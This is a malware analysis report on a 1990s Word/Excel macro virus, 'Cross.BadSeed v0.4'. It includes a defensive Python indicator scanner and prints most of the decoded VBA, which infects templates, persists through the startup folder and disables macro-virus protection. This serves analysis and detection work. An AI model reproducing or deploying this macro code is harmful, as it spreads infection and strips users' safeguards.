Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aafefcf94ec34f32…

MALICIOUS

Office (OLE)

Size: 29.5 KB  Created: 1998-12-08 08:08:44  Authoring application: Microsoft Excel  First seen: 2012-06-14
MD5: 05243d56856db0239f07c5a01e765404
SHA-1: bcd373c20fa250429cac3a4ddc3bc92361755a1d
SHA-256: aafefcf94ec34f32080b848ab4146eac61dd16c2d19bb6fd85293889371ed0c7
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV detection (Doc.Trojan.Hopper-7) together with the VBA project in the OLE file indicates malicious intent. The extracted macro identifies itself as "Cross.BadSeed v0.4" and is a cross-application Word/Excel infector: the single ThisWorkbook module carries both a Word Document_Close handler and an Excel Workbook_Deactivate handler, and it reaches the other application through CreateObject("Excel.Application") and GetObject(, "Word.Application"), which is what the CreateObject/GetObject heuristics flag. Persistence does not go through Run keys: on the Word side the macro replaces the ThisDocument module of the Normal template (NormalTemplate.VBProject) with its own code, using the comment '<!--1nternal--> on line 1 as an already-infected marker; on the Excel side it creates a workbook named "Book1." in Excel's startup folder (Application.StartupPath) and inserts the module into it, so the code loads every time Excel starts. That startup-folder/template mechanism corresponds more closely to ATT&CK T1137.001 (Office Template Macros) than to the T1547.001 mapping shown above. The System.PrivateProfileString writes to the Options6 value under HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel and under the HKEY_LOCAL_MACHINE New User Settings branch are defensive-evasion rather than persistence: the macro installs them in Word's Normal template as a routine named DisableAV and pairs them with Options.VirusProtection = False, i.e. it clears Excel 97's and Word 97's macro virus protection warning. The payload is date-gated (Select Case Day(Now) on days 1, 5, 10, 15 and 20 of the month, each with an additional Rnd check): it opens the geocities URL in a browser via FollowHyperlink, replaces "I" with "1" or deletes the word "not" in the active document, or displays an Office Assistant balloon or status-bar banner crediting "1nternal".

Heuristics 5

  • ClamAV: Doc.Trojan.Hopper-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-7
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm  (in document text, OLE body; the same URL is the Address argument of the macro's FollowHyperlink call)
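The heuristics above are what an automated scanner fires on; the indicators that actually distinguish this sample (Normal template VBProject injection, a "Book1." workbook in Excel's StartupPath, Options6 cleared under the Office 8.0 registry branch, VirusProtection turned off) are specific strings in the decoded VBA. The following Python is an added example, not part of this report or of oletools: it scans decoded VBA source (for instance the macros.bas that olevba extracts) line by line for those indicators, extracts embedded URLs, and checks whether one module carries both Word and Excel event handlers. The sample input is an excerpt of the macro listed in this report, constructed inline so the script runs offline; the rule names, severities and the verdict thresholds are this example's own choices, not the report's scoring.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample input: an excerpt of the Cross.BadSeed ThisWorkbook module
# shown in this report, trimmed to the lines that carry indicators.
SAMPLE_VBA = r'''
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set xlApp = CreateObject("Excel.Application")
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
        xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
    End If
    ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True
End Sub
Private Sub Workbook_Deactivate()
    Set WordObj = GetObject(, "Word.Application")
End Sub
'''


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line: int
    text: str


# Rule names and severities are this example's own (assumption), not the report's.
RULES = [
    ("normal_template_infection", "high", re.compile(r"NormalTemplate\.VBProject", re.I)),
    ("module_code_injection", "high", re.compile(r"\b(InsertLines|DeleteLines)\b", re.I)),
    ("xlstart_persistence", "high", re.compile(r"StartupPath\b.*Book1\.", re.I)),
    ("registry_write_private_profile", "high",
     re.compile(r"System\.PrivateProfileString\(.*HKEY_(LOCAL_MACHINE|CURRENT_USER)", re.I)),
    # Options6 under the Office 8.0 branch is the value the macro's own DisableAV clears.
    ("excel97_options6_cleared", "high", re.compile(r"Office\\8\.0\\.*\"Options6\"", re.I)),
    ("virus_protection_off", "high", re.compile(r"VirusProtection\s*=\s*False", re.I)),
    ("createobject", "medium", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("getobject", "medium", re.compile(r"\bGetObject\s*\(", re.I)),
    ("followhyperlink", "medium", re.compile(r"\bFollowHyperlink\b", re.I)),
    ("marker_1nternal", "info", re.compile(r"'<!--1nternal-->")),
]


def scan_vba(source: str) -> list[Finding]:
    """Return one Finding per (rule, line) match over decoded VBA source."""
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(name, severity, lineno, line.strip()))
    return findings


def extract_urls(source: str) -> list[str]:
    """URLs reachable from the macro itself (as opposed to the document body)."""
    return sorted(set(re.findall(r"https?://[^\s\"']+", source)))


def cross_application_infector(source: str) -> bool:
    """True when one module declares both a Word and an Excel event handler."""
    has_word = re.search(r"\bSub\s+Document_(Open|Close)\b", source, re.I) is not None
    has_excel = re.search(r"\bSub\s+Workbook_(Open|Deactivate|Close)\b", source, re.I) is not None
    return has_word and has_excel


def verdict(source: str) -> str:
    """Example thresholds (assumption): persistence plus AV tampering is malicious,
    either one alone is suspicious, otherwise clean."""
    names = {f.rule for f in scan_vba(source)}
    persistence = names & {"normal_template_infection", "xlstart_persistence"}
    av_tamper = names & {"excel97_options6_cleared", "virus_protection_off"}
    if persistence and av_tamper:
        return "malicious"
    if persistence or av_tamper:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    for f in scan_vba(SAMPLE_VBA):
        print(f"{f.severity:6} {f.rule:32} L{f.line}: {f.text}")
    print("urls:", extract_urls(SAMPLE_VBA))
    print("cross-application infector:", cross_application_infector(SAMPLE_VBA))
    print("verdict:", verdict(SAMPLE_VBA))
```

Run it against `olevba --decode sample.xls` output or the extracted macros.bas; the rules are line-oriented, so a VBA statement split with `_` continuation characters should be joined before scanning.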

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   6397 bytes
SHA-256: fcfe587336906b8f0ee1adc7151fc22f3ee65937d733730af42b6d04827ea4f0
Detection
ClamAV: Doc.Trojan.Hopper-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private InRoutine As Boolean
Private Sub Document_Close()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
            xlApp.Workbooks("Book1.").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            xlApp.Workbooks("Book1.").Close SaveChanges:=True
        End If
        xlApp.Application.Quit
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
    Select Case Day(Now)
        Case 15 And (Int((10 * Rnd) + 1) = 1)
            ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True, AddHistory:=False
        Case 1 And (Int((10 * Rnd) + 1) = 1)
            For i = 1 To ActiveDocument.Characters.Count
                If ActiveDocument.Characters(i).Text = "I" Then ActiveDocument.Characters(i).Text = "1"
            Next
        Case 5 And (Int((10 * Rnd) + 1) = 1)
            For i = 1 To ActiveDocument.Words.Count
                If ActiveDocument.Words(i).Text = "not" Then ActiveDocument.Words(i).Text = ""
            Next
        Case 10 And (Int((15 * Rnd) + 1) = 1)
            With Assistant.NewBalloon
                .Heading = "Cross.BadSeed v0.4"
                .Text = "Programmer:        1nternal" + Chr(13) + "Class Infection:    VicodenES" + Chr(13) + "ActiveX Concept: 1nternal" + Chr(13) + "Book1. Concept:  VicodenES" + Chr(13) + Chr(13) + "1nternal also wishes to thank all contributors and supporters which have made Cross.BadSeed possible."
                .Show
            End With
        Case 20 And (Int((5 * Rnd) + 1) = 1)
            Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
    End Select
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        Set WordObj = GetObject(, "Word.Application")
        If WordObj = "" Then
            Set WordObj = CreateObject("Word.Application")
            Quit = True
        End If
        Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
        If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
            WordObj.Options.SaveNormalPrompt = False
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
            W
... (truncated)